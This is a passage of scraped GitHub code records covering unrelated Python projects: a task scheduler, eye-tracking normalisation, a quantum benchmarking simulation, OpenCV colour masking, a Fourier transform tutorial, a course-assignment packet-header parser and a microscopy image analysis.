hour*3600+minute*60+second\n\n#把要执行得时间点和要执行的方法放到一个列表中\nrun_list.append([run_time(10,8,0),{\"g_command\":\"get_department_report_easy\",\"department\":3},1,\"【预执行命令测试】哆儿,今天10.08获取市场部工作计划\"])\nrun_list.append([run_time(10,18,0),{\"g_command\":\"get_department_report_easy\",\"department\":2},1,\"【预执行命令测试】哆儿,今天10.18获取直播部工作计划\"])\nrun_list.append([run_time(10,28,0),{\"g_command\":\"get_department_report_easy\",\"department\":4},1,\"【预执行命令测试】哆儿,今天10.28获取生产售货部工作计划\"])\nrun_list.append([run_time(10,38,0),{\"g_command\":\"get_department_report_easy\",\"department\":1},1,\"【预执行命令测试】哆儿,今天10.38获取技术货部工作计划\"])\nrun_list.append([run_time(10,58,0),{\"g_command\":\"get_department_report_easy\",\"department\":5},1,\"【预执行命令测试】哆儿,今天10.58获取办公室工作计划\"])\n\n\n\n\n\n\n\n\ndef call_back(result,json_obj,state):\n \n\n \n print(result)\n pass\n\n\n\nget_api = getapi.get_api(call_back)\n#时间戳开始时间是 1970-01-01 08:00:00\n\n#创建一个定时器方法,该方法每1秒执行一次\ndef alarm_clock():\n\n #判断当前时间是否是 0:0:0\n\n now = datetime.datetime.now()\n if now.hour == 0 and now.minute == 0 and now.second == 0:\n #把run_list中的所有元素的第三个元素设置为1\n for i in run_list:\n i[2]=1\n\n #遍历 run_list\n for i in run_list:\n if i[2]==1:\n #格式化当天的年月日\n ttime = time.strftime(\"%Y-%m-%d\", time.localtime())+\" 00:00:00\"\n #把当天的年月日转换为时间戳\n ttime2 = time.mktime(time.strptime(ttime, \"%Y-%m-%d %H:%M:%S\"))\n gettime = ttime2+i[0] #当天的时间戳+run_list中的时间点\n nowtime = int(time.time()) #现在的时间错\n if nowtime == gettime: #\n i[2]=0\n \n \n\n \n get_api.add_get_api(i[1])\n \n \n \n threading.Timer(0.5, alarm_clock).start()\n\n\n\n#每1秒执行 一次alarm_clock方法\nthreading.Timer(1, alarm_clock).start()\n\n\n\ntcommand = mate.get_mate(\"告诉我今天技术部工作计划\")\n\nif tcommand != False:\n get_api.add_get_api(tcommand[0])\n\n\n\n\n\n#get_api.add_get_api({\"g_command\":\"get_department_report_easy\",\"department\":4})\n#get_api.add_get_api({\"g_command\":\"get_department_report_easy\",\"department\":3})\n#get_api.add_get_api({\"g_command\":\"get_department_report_easy\",\"department\":2})\n#get_api.add_get_api({\"g_command\":\"get_department_report_easy\",\"department\":1})\n\nwhile 1:\n pass","repo_name":"c2194/taskbook","sub_path":"flask/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2938,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"34413822851","text":"from feature_generation import globals\nimport pandas as pd\nfrom feature_generation.eyetracking.saccades import (\n get_saccade_duration,\n)\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\n\ndef normalize_data(data):\n return [normalize_columns(df) for df in data]\n\n\ndef normalize_columns(df):\n column_names = globals.dataset.column_names\n df[column_names[\"pupil_diameter\"]] = min_max_normalize(\n df[column_names[\"pupil_diameter\"]]\n )\n df = normalize_x_and_y(df)\n df = normalize_time(df)\n return df\n\n\ndef min_max_normalize(values):\n return (values - values.min()) / (values.max() - values.min())\n\n\ndef normalize_time(df):\n column_names = globals.dataset.column_names\n min_time = df[column_names[\"time\"]].min()\n df[column_names[\"time\"]] = df[column_names[\"time\"]] - min_time\n df[column_names[\"fixation_end\"]] = df[column_names[\"fixation_end\"]] - min_time\n df = fix_outliers_in_time(df)\n return df\n\n\ndef normalize_x_and_y(df):\n df[\"x_normalized\"] = min_max_normalize(df[\"x\"]) * 1000\n df[\"y_normalized\"] = min_max_normalize(df[\"y\"]) * 1000\n return df\n\n\ndef fix_outliers_in_time(df):\n saccade_durations = pd.Series(get_saccade_duration(df))\n saccade_durations.index = df.index\n median_duration = saccade_durations.median()\n threshold = 1000\n bool_series = saccade_durations > threshold\n indices = df[bool_series].index\n for i in indices:\n diff = saccade_durations[i]\n df.loc[i + 1 :, \"time\"] -= diff - median_duration\n df.loc[i + 1 :, \"fixation_end\"] -= diff - median_duration\n return df\n","repo_name":"s0lvang/ideal-pancake","sub_path":"feature_generation/normalize/normalize.py","file_name":"normalize.py","file_ext":"py","file_size_in_byte":1594,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"75"} +{"seq_id":"22839121532","text":"import matplotlib.pyplot as plt\nimport multiprocessing as mp\nimport copy\nfrom scipy.optimize import curve_fit\nfrom lib.oneqrb import *\n\n\ndef RB_single_sequence(l, delta, rho_initial, delta_t, noise_type):\n np.random.seed()\n cliff_seq = np.random.choice(24, l[-1], replace=True)\n # add noise here\n noise_seq = delta * np.ones(len(cliff_seq))\n # end of adding noise\n seq = get_seq_1q(cliff_seq, noise_seq, delta_t=delta_t, noise_type=noise_type)\n f = np.zeros(len(l))\n # rho = copy.deepcopy(rho_initial)\n\n g = get_perfect_cliff(np.random.randint(24))\n rho = g @ copy.deepcopy(rho_initial) @ g.conj().T\n rho_rd_initial = g @ copy.deepcopy(rho_initial) @ g.conj().T\n\n for i in range(len(seq)):\n rho = seq[i] @ rho @ seq[i].conj().T\n if i+1 in l:\n inv = get_seq_inverse(cliff_seq[:(i+1)])\n rho_inversed = inv @ rho @ inv.conj().T\n # fidelity = abs(np.trace(rho_initial @ rho_inversed))\n fidelity = abs(np.trace(rho_rd_initial @ rho_inversed))\n j = l.index(i+1)\n f[j] += fidelity\n return f\n\n# Fitting function\ndef func(x, B, r):\n return 1/2 * (1 - 2 * r) ** x + B\n\n\nL = [1, 3, 5, 7, 10]\ndt = 100\nnoise_type = HAMILTONIAN_NOISE\nrho_0 = np.array([[1, 0],\n [0, 0]])\nrep = 3\n\n\n# constant noise angle TODO: noise frequency here\ndelta_list = [x * 0.01 for x in list(range(1, 51))]\n# delta_list = [0.05, 0.1, 0.15, 0.2]\n\nF_Clifford = np.zeros(len(delta_list))\nr_sqrd = np.zeros(len(delta_list))\n\n\nif __name__ == '__main__':\n for i in range(len(delta_list)):\n result_list = []\n\n def log_result(result):\n result_list.append(result)\n\n pool = mp.Pool()\n for re in range(rep):\n pool.apply_async(RB_single_sequence, args=(L, delta_list[i], rho_0, dt, noise_type), callback=log_result)\n pool.close()\n pool.join()\n F = sum(result_list) / rep\n print(F)\n\n ff = open(str(delta_list[i]) + \"_1q.pkl\", \"wb\")\n pickle.dump((delta_list[i], F), ff)\n ff.close()\n\n popt, pcov = curve_fit(func, L, F, p0=[1, 0], bounds=(0, 1), maxfev=5000)\n F_Clifford[i] = (1 - popt[1]) * 100\n\n residuals = F - func(L, *popt)\n ss_res = np.sum(residuals**2)\n ss_tot = np.sum((F - np.mean(F))**2)\n r_sqrd[i] = 1 - (ss_res/ss_tot)\n\n print(F_Clifford)\n print(r_sqrd)\n\n f5 = open('const_delta_list_1q.pkl', 'wb')\n pickle.dump(delta_list, f5)\n f5.close()\n\n f6 = open('const_delta_fidelity_1q.pkl', 'wb')\n pickle.dump(F_Clifford, f6)\n f6.close()\n\n f7 = open('const_delta_list_r_squared_1q.pkl', 'wb')\n pickle.dump(r_sqrd, f7)\n f7.close()\n\n plot1 = plt.figure(1)\n plt.plot(delta_list, F_Clifford, 'o', markersize=4)\n plt.xlabel(\"Dephasing noise angle (rad)\")\n plt.ylabel(\"Clifford fidelity (%)\")\n plt.show()\n\n plot2 = plt.figure(2)\n plt.plot(delta_list, r_sqrd, 'o', markersize=4)\n plt.xlabel(\"Dephasing noise angle (rad)\")\n plt.ylabel(\"R_squared\")\n plt.show()\n\n","repo_name":"TrellixVulnTeam/RB_2-qubit_NWB2","sub_path":"RB_1q/1q_mp_RB_const_delta.py","file_name":"1q_mp_RB_const_delta.py","file_ext":"py","file_size_in_byte":3050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"5153385506","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Feb 17 19:26:16 2021\nHue. de 0 a 179 \\ matiz\nSaturation: de 0 a 255 \\saturacion\nValue: de 0 a 255 \\brillo o valor\n[H,S,V]\n@author: jhongvp\n\"\"\"\n\nimport cv2\nimport numpy as np\n\ncap=cv2.VideoCapture(0)\n\nblueBajo=np.array([100,100,20],np.uint8)\nblueAlto=np.array([125,255,255],np.uint8)\n\nwhile True:\n ret, frame=cap.read()\n if ret == True:\n frameHSV=cv2.cvtColor(frame,cv2.COLOR_BGR2HSV)\n maskBlue=cv2.inRange(frameHSV,blueBajo,blueAlto)\n maskBluevis = cv2.bitwise_and(frame,frame, mask=maskBlue)\n cv2.imshow('maskBluevis',maskBluevis)\n cv2.imshow('maskBlue',maskBlue)\n cv2.imshow('frame',frame)\n if cv2.waitKey(1) & 0xFF == ord('s'):\n break\ncap.release()\ncv2.destroyAllWindows()\n","repo_name":"Jhongesell/detertor-de-poligonos-y-sus-parametros","sub_path":"models/omes/Detec-objet/07/program06.py","file_name":"program06.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"19522867856","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Dec 26 11:14:15 2022\r\n\r\n@author: Aralimarad\r\n\"\"\"\r\n\r\n\"\"\"\r\nPython program to create a tuple of n integer numbers\r\nand convert it to a singleton tuples of values. \r\nExample t=(1,2,3) must be converted as t=((1,),(2,),(3,))\r\n\r\n\"\"\"\r\nn=int(input(\"Enter a length:\"))\r\nl=[]\r\nfor i in range(n):\r\n l.append(int(input(\"Enter a number:\")))\r\nprint(\"Tuple is:\",tuple(l))\r\nx=[]\r\nfor k in l:\r\n m=tuple((k,)) #m=k, m=tuple(1,) m=(1,)\r\n x.append(m) #x=[(1,),(2,),(3,)]\r\nprint(\"Tuple converted into a singleton tuple\", tuple(x))\r\n\r\n","repo_name":"mcaralimarad/My-python-codes","sub_path":"lt4.py","file_name":"lt4.py","file_ext":"py","file_size_in_byte":572,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"15361123284","text":"##### My code #####\n##### Runtime 145ms, Memory 18.9MB #####\n\ndef topKFrequent(nums: List[int], k: int) -> List[int]: \n freqs = collections.Counter(nums)\n\n heap, res = [], []\n for val, freq in freqs.items():\n heapq.heappush(heap, (-freq, val))\n\n for _ in range(k):\n res.append(heapq.heappop(heap)[1])\n\n return res","repo_name":"imtaesuu/AlgorithmPractice_with_Python","sub_path":"Heap/Leetcode_Top_K_Frequent_Elements/Leetcode_Top_K_Frequent_Elements.py","file_name":"Leetcode_Top_K_Frequent_Elements.py","file_ext":"py","file_size_in_byte":349,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"1674992313","text":"# вариант исполнения кода с генератором спосков\nimport asyncio\nimport time\n\nimport aiohttp\nfrom more_itertools import chunked\n\n\nasync def request_people(session, person_id):\n response = await session.get(f'http://swapi.dev/api/people/{person_id}')\n person_data = await response.json()\n return person_data\n\n\nasync def main():\n start = time.time()\n async with aiohttp.ClientSession() as session:\n tasks = [request_people(session, i) for i in range(1, 51)]\n for chunk_of_tasks in chunked(tasks, 10):\n people_chunk = await asyncio.gather(*chunk_of_tasks)\n for num, i in enumerate(people_chunk, 1):\n print(num, i)\n print()\n print(time.time() - start)\n\n\nasyncio.run(main())\n","repo_name":"ervand7/Summary","sub_path":"Python/Parallelism/Asinchrony/библиотека Asyncio/лекция_нетологии/async3.py","file_name":"async3.py","file_ext":"py","file_size_in_byte":788,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"75"} +{"seq_id":"30556190764","text":"from lib.corpus import Corpus\r\nfrom lib.model import n_gram_model\r\nfrom lib.discounting import discounting\r\nfrom tools.train import train\r\nfrom tools.test import test\r\nfrom ctypes import sizeof\r\nimport sys\r\nfrom tqdm import tqdm\r\nimport argparse\r\nimport json\r\nfrom easydict import EasyDict as edict\r\n\r\nsys.path.append(\"..\")\r\n\r\n\r\ndef parse_args():\r\n parser = argparse.ArgumentParser(description='n-gram language model')\r\n parser.add_argument('--data_path', dest='data_path',\r\n help='path of dataset',\r\n default='./data/', type=str)\r\n parser.add_argument('--config_path', dest='config_path',\r\n help='path of config',\r\n default='./configs/default.json', type=str)\r\n args = parser.parse_args()\r\n return args\r\n\r\n\r\ndef get_config(args):\r\n config_path = args.config_path\r\n with open(config_path, 'r') as f:\r\n data = json.load(f)\r\n cfg = edict(data.copy())\r\n return cfg\r\n\r\n\r\ndef main(args, cfg):\r\n model = n_gram_model()\r\n corpus = Corpus(args.data_path, cfg)\r\n if cfg.train:\r\n train(model, corpus,cfg)\r\n if cfg.save:\r\n model.save()\r\n else:\r\n model.load()\r\n test(model, corpus, cfg)\r\n\r\n\r\nif __name__ == '__main__':\r\n args = parse_args()\r\n cfg = get_config(args)\r\n main(args, cfg)\r\n","repo_name":"Dou-Yiming/CS382-Projects","sub_path":"Project1/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1355,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"25448106728","text":"import numpy as np\nimport matplotlib as mpl\nmpl.use('Agg')\nfrom matplotlib import pyplot as plt\nimport subprocess as sp\n\nfrom numpy import fft\n\ndef getGlobals():\n global DATA_DIR\n DATA_DIR = \"1_PLOTS_DATA/\"\n sp.call(f\"mkdir -p {DATA_DIR}\", shell=True)\n\ndef get_f_x():\n global x, dx, Lx, Nx\n\n # Gaussian Function\n global sigma # For use when plotting the analytic result\n sigma = 1\n x = np.linspace(-20,20,1001)\n f_x = np.sqrt(1/2/np.pi/sigma**2) * np.exp(-x**2 / 2 / sigma**2) + 0j\n\n ## Shifted Gaussian Function\n ## Shift in real-space results is phase change of the DFT\n ## f(x) --> f(x+dx) => f(k) --> f(k) * e^{-i k dx}\n ## This is called the \"Fourier Shift Theorem\"\n #x = np.linspace(-20,20,1001)\n #global shift # Use this to plot analytic result later\n #shift = 1.0\n #f_x = np.sqrt(1/2/np.pi) * np.exp(-(x-shift)**2 / 2) + 0j\n\n ## Gaussian Function with complex factor (opposite as previous one)\n ## Shift in real-space results is phase change of the DFT\n #x = np.linspace(-20,20,1001)\n #global p0 # Use this to plot analytic result later\n #p0 = 1.0 # Initial momentum --> Intepret as a coordinate shift in momentum space\n #factor = np.exp( -1j * 2 * np.pi * p0 * x )\n #f_x = np.sqrt(1/2/np.pi) * np.exp(-x**2 / 2) * factor\n\n ## Sinusoidal function of frequency k = +- 1\n ## Large grid sampling\n #x = np.linspace(-20,20,1001)\n #f_x = np.sin( 2 * np.pi * x ) + 0j\n \n ## Sinusoidal function of frequency k = +- 1\n ## Small grid sampling\n #x = np.linspace(-2,2,101)\n #f_x = np.sin( 2 * np.pi * x ) + 0j\n\n ## Addition of two waves\n #x = np.linspace(-10,10,2001)\n #f_x = np.sin( 2 * np.pi * x ) + 0.5 * np.sin( np.pi * x ) + 0j\n \n ## Gaussian-dressed wave-packet\n #x = np.linspace(-10,10,1001)\n #f_x = np.exp(-x**2 / 2 / 1**2) * np.sin( 2 * np.pi * x ) + 0j\n \n ##f(x) = 1.0 --> f(k) = delta(k)\n #x = np.linspace(-10,10,1001)\n #f_x = np.ones( len(x) )\n \n ## Single-frequency plane-waves (only positive / only negative)\n #x = np.linspace(-10,10,2001)\n #f_x = np.exp( 1j * 2 * np.pi * x ) # cos + sin\n #f_x = np.exp( -1j * 2 * np.pi * x ) # cos - sin\n\n ## Weird Function -- but which has a frequency\n #x = np.linspace(-50,50,1001)\n #f_x = np.exp( np.sin( np.pi * x ) ) * np.exp( - x**2 / 2 / 5 )\n\n\n # Initialize useful numbers\n Nx = len(x)\n Lx = x[-1] - x[0] # Last minus first\n dx = x[1] - x[0] # Second minus first\n\n \"\"\"\n # Normalize Function\n NORM = np.sum( np.conjugate(f_x) * f_x ) * dx\n #print( \"NORM x (Before)\", NORM )\n f_x /= np.sqrt(NORM)\n NORM = np.sum( np.conjugate(f_x) * f_x ) * dx\n #print( \"NORM x (After) \", NORM )\n \"\"\"\n \n return f_x\n\ndef plot_f_x(f_x):\n plt.plot( x, f_x.real, c=\"black\", label=\"RE\" )\n plt.plot( x, f_x.imag, c=\"red\", label=\"IM\" )\n plt.legend()\n plt.xlim(x[0],x[-1])\n #plt.xlim(-2,2)\n plt.xlabel(\"x\", fontsize=18)\n plt.ylabel(\"f(x)\", fontsize=18)\n plt.tight_layout()\n plt.savefig(f\"{DATA_DIR}/f_x.jpg\")\n plt.clf()\n\ndef get_FT_oneSIDED( f_x ):\n\n # Define the k-grid (reciprocal grid)\n dk = 2 * np.pi / Lx\n kmax = 1 / 2 / dx # This is not angular frequency\n k = np.linspace( -kmax, kmax, Nx )\n\n # Define the Fourier matrix, W\n n = np.arange(Nx).reshape( (-1,1) )\n m = np.arange(Nx).reshape( (1,-1) )\n\n ### One-sided transform\n W = np.exp( -2j*np.pi * m * n / Nx )\n \n # Operate W on the real-space function\n f_k = W @ f_x\n \n ### Roll coordinates such that zero is centered\n ### Required for the one-sided transform\n f_k = np.roll( f_k, Nx//2 )\n\n # Add normalization and integral infinitesimal\n f_k *= dx / np.sqrt( 2 * np.pi )\n\n return k, f_k\n\n\ndef get_FT_Centered( f_x ):\n\n # Define the k-grid (reciprocal grid)\n dk = 2 * np.pi / Lx\n kmax = 1 / 2 / dx # This is not angular frequency\n k = np.linspace( -kmax, kmax, Nx )\n\n # Define the Fourier matrix, W\n n = np.arange(Nx).reshape( (-1,1) )\n m = np.arange(Nx).reshape( (1,-1) )\n\n ### Centered transform\n ### Here, we shift the indices to the center\n a = (Nx)//2\n W = np.exp( -2j*np.pi * (m-a) * (n-a) / Nx )\n \n # Operate W on the real-space function\n f_k = W @ f_x\n \n # Add normalization and integral infinitesimal\n f_k *= dx / np.sqrt( 2 * np.pi )\n\n return k, f_k\n\ndef get_numpy_FT( f_x ):\n # Get the fourier transform\n k = fft.fftfreq( len(f_x), d=dx )\n f_k = fft.fft( f_x, norm=\"ortho\" ) * np.sqrt( np.pi / 2 )\n\n # Shift so that most negative k is first\n f_k = np.roll( f_k, Nx//2 )\n k = np.roll( k, Nx//2 )\n\n return k, f_k\n\ndef plot_f_k(k,f_k,k_np,f_k_np,title):\n\n # Plot a version comparing directly to Numpy\n plt.plot( k, np.abs(f_k.real), \"-\", c='black', lw=10, alpha=0.5, label=\"RE (Manual)\" )\n plt.plot( k, np.abs(f_k.imag), \"o-\", c='black', lw=10, alpha=0.5, label=\"IM (Manual)\" )\n\n #print( \"NORM:\", np.sum( np.abs(f_k)**2 ) * (k[1]-k[0]) )\n\n plt.plot( k_np,np.abs(f_k_np.real),\"-\", c='red', lw=2, label=\"RE (Numpy)\" )\n plt.plot( k_np,np.abs(f_k_np.imag), \"o-\", c='red', lw=2, label=\"IM (Numpy)\" )\n\n #print( \"NORM:\", np.sum( f_k_np.real**2 ) * (k_np[1]-k_np[0]) )\n\n plt.legend()\n plt.xlim(-2,2 )\n plt.xlabel(\"k\", fontsize=18)\n plt.ylabel(\"f(k)\", fontsize=18)\n plt.tight_layout()\n plt.savefig(f\"{DATA_DIR}/f_k_{title}.jpg\")\n plt.clf()\n\n\n #########################################\n # Plot a ''clean'' one without comparing to Numpy\n plt.plot( k, f_k.real, \"-\", c='black', lw=2, label=\"RE\" )\n plt.plot( k, f_k.imag, \"-\", c='red', lw=2, label=\"IM\" )\n\n # Gaussian function in k-space -- Analytic Result\n analytic_func_k = np.sqrt(1/2/np.pi) * np.exp(-2 * sigma**2 * k**2 * np.pi**2)\n plt.plot( k, analytic_func_k, \"o\", c=\"black\", label=\"Analytic RE\" )\n\n # Shifted Gaussian function\n #analytic_func_k = np.sqrt(1/2/np.pi) * np.exp(-2 * k**2 * np.pi**2)\n #shifted_analytic = np.exp(-1j * 2 * np.pi * k * shift) * analytic_func_k\n #plt.plot( k, shifted_analytic.real, \"o\", c=\"black\", label=\"Analytic RE\" )\n #plt.plot( k, shifted_analytic.imag, \"o\", c=\"red\", label=\"Analytic IM\" )\n\n plt.legend()\n plt.xlim(-2,2 )\n plt.xlabel(\"k\", fontsize=18)\n plt.ylabel(\"f(k)\", fontsize=18)\n plt.tight_layout()\n plt.savefig(f\"{DATA_DIR}/f_k_{title}_clean.jpg\")\n plt.clf()\n\n\n\n\n\ndef main():\n\n getGlobals()\n f_x = get_f_x()\n plot_f_x(f_x)\n k, f_k = get_FT_oneSIDED(f_x)\n k_np, f_k_np = get_numpy_FT(f_x)\n plot_f_k(k, f_k, k_np, f_k_np,title=\"One-Sided\")\n k, f_k = get_FT_Centered(f_x)\n plot_f_k(k, f_k, k_np, f_k_np,title=\"Centered\")\n\n\n\nif ( __name__ == \"__main__\" ):\n main()\n\n\n","repo_name":"bradenmweight/Intro_Computational_Quantum_Mechanics","sub_path":"notes/codes/Chapter_4/1_Fourier_Transform_on_a_Discrete_Grid.py","file_name":"1_Fourier_Transform_on_a_Discrete_Grid.py","file_ext":"py","file_size_in_byte":6775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"22889031716","text":"from click import echo\nfrom click.testing import CliRunner\nfrom click_anno import Injectable, command, inject\n\ndef test_injectable():\n class A(Injectable):\n @classmethod\n def __inject__(cls):\n return A()\n\n @command\n def func(a: A):\n assert isinstance(a, A)\n echo(f'{type(a).__name__}')\n\n result = CliRunner().invoke(func, [])\n assert result.output == \"A\\n\"\n assert result.exit_code == 0\n\n\ndef test_inject():\n class Custom:\n pass\n\n inject(Custom, lambda: Custom())\n\n @command\n def func(a: Custom):\n assert isinstance(a, Custom)\n echo(f'{type(a).__name__}')\n\n result = CliRunner().invoke(func, [])\n assert result.output == \"Custom\\n\"\n assert result.exit_code == 0\n","repo_name":"Cologler/click-anno-python","sub_path":"tests/test_inject.py","file_name":"test_inject.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"23121910474","text":"import socket\nimport struct\n\ndef parsing_ethernet_header(data):\n ethernet_header = struct.unpack(\"!6c6c2s\", data)\n ether_src = convert_ethernet_address(ethernet_header[0:6])\n ether_dest = convert_ethernet_address(ethernet_header[6:12])\n ip_header = \"0x\"+ethernet_header[12].hex()\n\n print(\"=======ethernet header=======\")\n print(\"src_mac_address:\", ether_src)\n print(\"dest_mac_address:\", ether_dest)\n print(\"ip_version\", ip_header)\n\ndef convert_ethernet_address(data):\n ethernet_addr = list()\n for i in data:\n ethernet_addr.append(i.hex())\n ethernet_addr = \":\".join(ethernet_addr)\n return ethernet_addr\n\n\nrecv_socket = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.ntohs(0x0800))\n\nwhile True:\n data = recv_socket.recvfrom(20000)\n parsing_ethernet_header(data[0][0:14])\n \n ip_header_ = struct.unpack(\"!B B H H H B B H 4s 4s\", data[0][14:34])\n ip_version = (ip_header_[0] & 0b11110000) >> 4\n ip_Length = ip_header_[0] & 0b00001111\n ip_differ = (ip_header_[1] & 0b11111100) >> 2\n ip_explicit = ip_header_[1] & 0b00000011\n ip_total_length = ip_header_[2]\n ip_identification = ip_header_[3]\n ip_flags = ip_header_[4]\n\n ip_reserved = (ip_header_[4] & 0x8000) >> 15 \n ip_not_fragments = (ip_header_[4] & 0x4000) >> 14\n ip_fragments = (ip_header_[4] & 0x2000) >> 13\n ip_fragments_offset = ip_header_[4] & 0x1fff\n\n ip_Time_to_live = ip_header_[5]\n ip_protocol = ip_header_[6]\n ip_header_checksum = ip_header_[7]\n ip_source = socket.inet_ntoa(ip_header_[8])\n ip_dest = socket.inet_ntoa(ip_header_[9])\n ip_padding = (ip_Length * 4) - 20\n\n\n print(\"=======ip_header=======\")\n print(\"ip_version: \", ip_version)\n print(\"ip_Length: \", ip_Length)\n print(\"differentiated_service_codepoint: \", ip_differ)\n print(\"explicit_congestion_notification: \", ip_explicit)\n print(\"total_length: \", ip_total_length)\n print(\"identification: \", ip_identification)\n print(\"flags: \", ip_flags)\n print(\">>>reserved_bit: \", ip_reserved)\n print(\">>>not_fragments: \", ip_not_fragments)\n print(\">>>fragments: \", ip_fragments)\n print(\">>>fragments_offset: \", ip_fragments_offset)\n print(\"Time to live: \", ip_Time_to_live)\n print(\"protocol: \", ip_protocol)\n print(\"header checksum: \", ip_header_checksum)\n print(\"source_ip_address: \", ip_source)\n print(\"dest_ip_address: \", ip_dest)\n\n \n if ip_protocol == 6:\n tcp_header = struct.unpack(\"!H H I I B B H H H\", data[0][34:54])\n\n tcp_src = tcp_header[0]\n tcp_dec = tcp_header[1]\n tcp_seq = tcp_header[2]\n tcp_header_length = (tcp_header[4] & 0b11110000) >> 4\n tcp_ack = (tcp_header[5] & 0b00010000) >> 4\n tcp_reserved = (tcp_header[4] & 0b00001110) >> 1\n tcp_nonce = (tcp_header[4] & 0b00000001)\n tcp_cwr = (tcp_header[5] & 0b10000000) >> 7\n tcp_urg = (tcp_header[5] & 0b00100000) >> 5\n tcp_push = (tcp_header[5] & 0b00001000) >> 3\n tcp_reset = (tcp_header[5] & 0b00000100) >> 2\n tcp_syn = (tcp_header[5] & 0b00000010) >> 1\n tcp_fin = tcp_header[5] & 0b00000001\n tcp_win = tcp_header[6]\n tcp_checksum = tcp_header[7]\n\n if tcp_ack == 1:\n tcp_ack_num = tcp_header[3]\n else :\n tcp_ack_num = 0\n \n if tcp_urg == 1:\n tcp_urgp = tcp_header[8]\n else :\n tcp_urgp = 0\n\n print(\"=======TCP_header=======\")\n print(\"src_port: \", tcp_src)\n print(\"dec_port: \", tcp_dec)\n print(\"seq_num: \", tcp_seq)\n print(\"ack_num: \", tcp_ack_num)\n print(\"header_len: \", tcp_header_length)\n print(\">>>reserved: \", tcp_reserved)\n print(\">>>nonce: \", tcp_nonce)\n print(\">>>cwr: \", tcp_cwr)\n print(\">>>urgent: \", tcp_urg)\n print(\">>>ack: \", tcp_ack)\n print(\">>>push: \", tcp_push)\n print(\">>>reset: \", tcp_reset)\n print(\">>>syn: \", tcp_syn)\n print(\">>>fin: \", tcp_fin)\n print(\"window_size_value: \", tcp_win)\n print(\"checksum: \", tcp_checksum)\n print(\"urgent pointer: \", tcp_urgp)\n\n elif ip_protocol == 17:\n udp_header = struct.unpack(\"!H H H H\", data[0][34+ip_padding:42+ip_padding])\n udp_src = udp_header[0]\n udp_dst = udp_header[1]\n udp_leng = udp_header[2]\n udp_checksum = udp_header[3]\n\n\n print(\"=======udp_header=======\")\n print(\"src_port: \", udp_src)\n print(\"dst_port: \", udp_dst)\n print(\"leng: \", udp_leng)\n print(\"header checksum: \", udp_checksum)\n\n","repo_name":"cnu-cse-datacom/2-packetcapture-omj9803","sub_path":"DC02_02_201702039_ohmyeongju.py","file_name":"DC02_02_201702039_ohmyeongju.py","file_ext":"py","file_size_in_byte":4584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"36987402492","text":"from typing import Any, Dict\n\nfrom fastapi import FastAPI\nfrom pydantic import BaseModel\nfrom celery_tasks import task_update_product\n\n\n# Default delay 15 seconds\nDEFAULT_DELAY = 15\napp = FastAPI()\n\n\nclass Task(BaseModel):\n post_url: str\n delay: int = DEFAULT_DELAY\n description: str = None\n payload: Dict[Any, Any]\n\n\n@app.get('/')\ndef greeting():\n return {'Hello'\n 'World!'}\n\n\n@app.post('/tasks/')\nasync def product_task(task: Task):\n # For demo purpose\n # repeat the job 100 times\n # Note: In production meaning this will trigger 100\n # concurrent requests immediately after delay seconds\n from random import randint\n from time import sleep\n for _ in range(100):\n # don't flood this free api\n sleep(randint(5, 10))\n task_update_product.apply_async(\n (task.post_url, task.payload,),\n countdown=task.delay,\n )\n return {'message': 'Send jobs!'}\n","repo_name":"zwang96-dl/fastapi_celery","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":944,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"72286494643","text":"import skimage.io as skio\nimport pandas as pd\nfrom skimage.morphology import disk, dilation, medial_axis\nfrom skimage.measure import label, regionprops\nimport shared.image as ima\nimport numpy as np\nfrom skimage.filters import threshold_otsu, threshold_local, sobel\nfrom skimage.morphology import extrema, binary_dilation, binary_erosion, disk, dilation\nimport shared.dataframe as dat\nfrom skimage import segmentation\nimport shared.math as mat\nimport math\nimport napari\n\n# INPUT PARAMETERS\n# file info\nmaster_folder = \"/Users/xwyan/Dropbox/LAB/ChangLab/Projects/Data/20230216_analysis_BRD4-series/\"\ndata_dir = \"%sdata/singleZ/\" % master_folder\ndata_dir2 = \"%sfigures/DNAFISH/\" % master_folder\noutput_dir = \"%sfigures/DNAFISH/\" % master_folder\n\nsample1 = 'DM-Ctrl_mix_mCh-Ctrl'\nfigure_name = sample1\npos_threshold = 15000\nneg_threshold = 12000\nsample1_pos = 'DM H2B-mCherry'\nsample1_neg = 'DM'\nnew_seg = 11000\n\nstart_fov = 15\n\nbatch = 2\nif batch > 0:\n file_name = '%s_%s_RAW' % (sample1, batch)\nelse:\n file_name = '%s_RAW' % sample1\nimg_hoechst_stack = skio.imread(\"%s%s/%s_ch00.tif\" % (data_dir, sample1, file_name), plugin=\"tifffile\")\nimg_DNAFISH_stack = skio.imread(\"%s%s/%s_ch02.tif\" % (data_dir, sample1, file_name), plugin=\"tifffile\")\nimg_mCherry_stack = skio.imread(\"%s%s/%s_ch01.tif\" % (data_dir, sample1, file_name), plugin=\"tifffile\")\n# img_laminB_stack = 